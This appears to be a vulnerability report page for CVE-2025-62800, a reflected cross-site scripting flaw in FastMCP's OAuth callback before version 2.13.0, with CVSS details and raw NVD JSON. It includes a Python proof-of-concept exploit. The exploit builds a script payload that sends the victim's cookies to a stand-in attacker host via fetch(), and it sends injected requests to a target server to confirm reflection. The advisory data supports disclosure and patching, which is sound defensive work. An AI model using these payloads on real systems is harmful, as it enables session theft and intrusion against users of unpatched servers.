Security Vulnerability Report
CVE-2025-62800 CVSS 6.1 MEDIUM

CVE-2025-62800

Published: 2025-10-28 22:15:37
Last Modified: 2025-11-07 01:49:53

Description

FastMCP is the standard framework for building MCP applications. Versions prior to 2.13.0 have a reflected cross-site scripting vulnerability in the OAuth client callback page (oauth_callback.py) where unescaped user-controlled values are inserted into the generated HTML, allowing arbitrary JavaScript execution in the callback server origin. The issue is fixed in version 2.13.0.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jlowin:fastmcp:*:*:*:*:*:*:*:* - VULNERABLE
FastMCP < 2.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-62800 PoC - FastMCP OAuth Callback XSS
# Target: FastMCP < 2.13.0


def generate_xss_payload():
    """
    Generate malicious OAuth callback URL with XSS payload
    """
    # Basic XSS payload to steal cookies
    xss_payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'
    # Note: the payload is inserted into the query string as-is (no URL encoding is applied here)
    callback_url = f"http://target-server/oauth/callback?state={xss_payload}&code=legitimate_code"
    return callback_url


def exploit(target_url, payload):
    """
    Send malicious callback request to trigger XSS
    """
    malicious_url = f"{target_url}/oauth/callback?state={payload}&code=test_code"
    print(f"[*] Sending malicious request to: {malicious_url}")
    response = requests.get(malicious_url, allow_redirects=False)
    print(f"[*] Response Status: {response.status_code}")
    # The callback page is vulnerable if the raw payload is reflected unescaped in the HTML body
    if payload in response.text:
        print("[!] Vulnerability confirmed - XSS payload reflected without sanitization")
        return True
    else:
        print("[*] Payload not found in response")
        return False


if __name__ == "__main__":
    target = "http://vulnerable-fastmcp-server:8000"
    payload = '<script>alert(document.domain)</script>'
    exploit(target, payload)
```

References

https://github.com/jlowin/fastmcp/security/advisories/GHSA-mxxr-jv3v-6pgc (Exploit, Third Party Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62800", "sourceIdentifier": "[email protected]", "published": "2025-10-28T22:15:36.983", "lastModified": "2025-11-07T01:49:53.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FastMCP is the standard framework for building MCP applications. Versions prior to 2.13.0 have a reflected cross-site scripting vulnerability in the OAuth client callback page (oauth_callback.py) where unescaped user-controlled values are inserted into the generated HTML, allowing arbitrary JavaScript execution in the callback server origin. The issue is fixed in version 2.13.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jlowin:fastmcp:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.13.0", "matchCriteriaId": "938DF638-7486-4DDB-A950-1A16D8FCCEA1"}]}]}], "references": [{"url": "https://github.com/jlowin/fastmcp/security/advisories/GHSA-mxxr-jv3v-6pgc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/jlowin/fastmcp/security/advisories/GHSA-mxxr-jv3v-6pgc", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}